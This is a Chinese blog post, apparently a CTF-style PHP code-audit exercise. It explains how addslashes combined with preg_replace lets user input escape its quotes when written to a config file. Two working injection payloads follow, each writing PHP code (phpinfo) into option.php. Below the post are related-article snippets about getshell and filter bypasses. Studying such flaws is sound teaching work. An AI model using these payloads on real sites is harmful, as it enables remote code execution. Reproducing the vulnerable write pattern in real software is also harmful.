PHP代码审计–Challenge3

最新推荐文章于 2021-03-17 06:39:28 发布
最新推荐文章于 2021-03-17 06:39:28 发布
阅读量330 收藏
点赞数
分类专栏: PHP代码审计 文章标签: php代码审计 代码审计小练习 代码审计入门 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CliffordR/article/details/103287073
版权

题目代码:

index.php
---------------------------------------------------------------------------
<?php
$str = addslashes($_GET['option']);                                   
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);

代码中的函数解释:

  • addslashes() 函数返回在预定义字符之前添 加反斜杠的字符串。预定义字符包括单引号,双引号,null,反斜杠(\)
  • file_get_contents() 把整个文件读入一个字符串中。
  • 正则匹配替换
  • file_put_contents() 函数把一个字符串写入文件中。

xxxxx/option.php
---------------------------------------------------------------------------
$option='test';

流程:

  1. 以get的方法传入一个参数,经过addslashes()后预定义字符前都多了反斜杠,注意反斜杠在特定条件下会产生转义的效果
  2. 经过第一步处理后,把xxxxx/option.php文件中的字符串读出来
  3. 进行正则匹配,此处把\\替换成\
  4. 经过正则的匹配替换后,写入xxxxx/option.php文件中

要达成的目的:

实现单引号的闭合,从而执行后面的语句

法一:

  • 传入?option=aaa';%0aphpinfo();//
    经过 addslashes() ,变成 aaa\';%0aphpinfo();//,此处%0a是换行符
  • 此时xxxxx/option.php文件内容变成
    $option=' aaa\';
    phpinfo();// ';
  • 这样一来就把引号闭合了,然后执行?option=bbb
  • 正则匹配时,会将两个单引号里的内容即 aaa\ ,替换为 bbb,此时xxxxx/option.php的内容变为

<?php
$option='xxx';
phpinfo();//';
?>

最后访问:/xxxxx/option.php

法二:

  • 访问?option=aaa\';phpinfo();//
  • 经过addslashes后,$str为 aaa\\\';phpinfo();//
  • 经过preg_replace正则匹配后,对\做了转义处理,xxxxx/option.php的内容变为:

<?php 
$option='aaa\\';phpinfo();//';
?>

最后访问:/xxxxx/option.php

D-R0s1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php_code_challenges练习challenge1~3
weixin_55029563的博客
07-21 244
Challenge1 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= <?php error_reporting(0); require __DIR__.'/lib.php'; echo base64_encode(hex2bin(strrev(bin2hex($flag)))), '<hr>'; highlight_file(__FILE__); ?> 使用PHP反跑一下编码解密。 challenge2 <?ph
PHP代码审计--Challenge6
D-R0s1的博客
02-12 1156
题目代码 <?php if(isset($_REQUEST[ 'ip' ])) { $target = trim($_REQUEST[ 'ip' ]); $substitutions = array( '&' => '', ';' => '', '|' => '', '-' => '', '$' => '', '(' => '', ')' =&gt...
PHP代码审计--Challenge7
D-R0s1的博客
02-12 658
题目代码 <?php $output = ""; if (isset($_GET['code'])) { $content = file_get_contents(__FILE__); $content = preg_replace('/FLAG\-[0-9a-zA-Z_?!.,]+/i', 'FLAG-XXXXXXXXXXXXXXXXXXXXXXX', $content); e...
10:Challenge 3(树状数组直接修改)
weixin_33901843的博客
07-19 102
总时间限制: 10000ms 单个测试点时间限制: 1000ms 内存限制: 262144kB描述 给一个长为N的数列,有M次操作,每次操作是以下两种之一: (1)修改数列中的一个数 (2)求数列中某连续一段的和 输入第一行两个正整数N和M。第二行N个整数表示这个数列。接下来M行,每行开头是一个字符,若该字符为'M',则表示一个修改操作,接下来两个整数x和y,表示把x位置的值修改为y;若该...
小密圈专题(1)-配置文件写入问题
dengzhasong7076的博客
02-24 301
p师傅的小密圈的一个问题 <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file); file_put_contents('...
php-pricecalculator-challenge
03-25
【标题】"php-pricecalculator-challenge" 是一个基于 PHP 的编程挑战,旨在设计并实现一个价格计算工具。这个挑战可能要求开发者创建一个可以处理商品定价、折扣计算以及税费的应用。 【描述】在“PHP价格计算器”...
php-challenge-test
03-16
在生产代码中添加必要的代码以检查何时未找到联系人,并添加另一个测试以测试该情况 添加您自己的逻辑以发送给定号码和正文的SMS,该方法应使用ContactService中的validateNumber方法并使用provider属性的方法来验证...
Crypto –challenge.zip
08-27
文件资源中有26道CYPTO类型的压缩文件解密CTF练习题目,从简易到难,可以加深压缩文件解密的理解。
tum-challenge matlab实现图片到3d点云
最新发布
06-20
tum_challenge matlab实现图片到3d点云
web_challenge3
02-10
在【web_challenge3】项目中,SCSS将被用于创建整洁、结构化的样式代码,帮助开发者更好地组织和重用样式,同时提高代码的可读性和可维护性。 以下是参与【web_challenge3】挑战时可能涉及的关键知识点: 1. **...
小密圈知识
11-03 201
p师傅的经典漏洞(小密圈的那些姿势) 2017年2月27日 p师傅在小密圈po的一个问题 <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',...
php_addslashes绕过与写入文件配置getshell
awanawan的博客
09-23 1051
绕过addslashes并写入文件配置getshellis_numeric函数 写入配置getshell与addslashes绕过: <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|'...
solve me(web wp)
Xi4or0uji
09-02 1385
warm up 逆着解下码 &lt;?php $chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="; echo hex2bin(strrev(bin2hex((base64_decode($chars))))); 得到结果flag{582a0f2c7e302244b110cc461f5cb100} badcom...
ctf 图片 php_PHP代码审计之CTF系列(1)
weixin_33450988的博客
03-09 987
PHP代码审计之CTF系列(1)采用github yaofeifly师傅的PHP练习。每个内容均采用docker。部署过程:进入对应的docker_env,使用docker-compose builddocker-compose up -d进入对应docker进程,查看地址访问即可。challenge 1访问地址,发现源码1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZg...
Getshell、文件上传绕过合集
晚风不及你
07-15 434
忘记在那个大佬的公众号上保存下来的了,为了保险点挂有道云链接,需要的自行查看。 链接: http://note.youdao.com/noteshare?id=51e22d12df941cd69eae5daf18468688&sub=AE2306B759DB4979BB136F12C104D040 部分展示: ...
一个PHP正则相关的“经典漏洞” preg_replace
3569
01-02 7453
https://www.cdxy.me/?p=756小密圈《代码审计》中看到P神发的“经典漏洞”,关于写配置文件这个功能点。问题代码 $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',"\$optio
php代码审计 github,【代码审计 PHP篇】Challenge 1
weixin_31817039的博客
03-17 254
前言专栏名为【代码审计】,面向CTFer和代码审计新手。基于代码小片段进行讲解,包含但不限于php等语言。此次题目来自:Code-Audit-Challenges: php/challenge-2Challenge...
CTF——web安全中的一些绕过
weixin_30497527的博客
10-14 1134
1 function check($number) 2 { 3 $one = ord('1'); 4 $nine = ord('9'); 5 for ($i = 0; $i < strlen($number); $i++) 6 { 7 $digit = ord($number{$i}); 8 ...
VSCode的一些相关使用总结及如何配置PHP运行环境
D-R0s1的博客
02-05 3756
前言 以前写代码的时候经常用pycharm,原因就是我也就能写点python,C和Java停留在云程序员阶段,PHP属于刚看懂的阶段。pycharm是一个很好的软件但是相对来说比较大,启动的时候比较费劲。经小伙伴推荐,VSCode比较轻便,内置了许多插件,可以满足好多种语言,但是我在运行php的时候,出现了一些问题,本文就是记录如何让VSCode成功运行php的笔记。 网上我找的一些教程对我来说我...
ieeephm2012-challenge代码 python
09-22
ieeephm2012-challenge是一个挑战性项目,意在通过Python编写代码解决相关问题。该项目可能涉及到处理大量数据、诊断故障、预测设备性能等等。 为了完成这个项目,首先需要理解问题的背景和要求。例如,如果是处理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值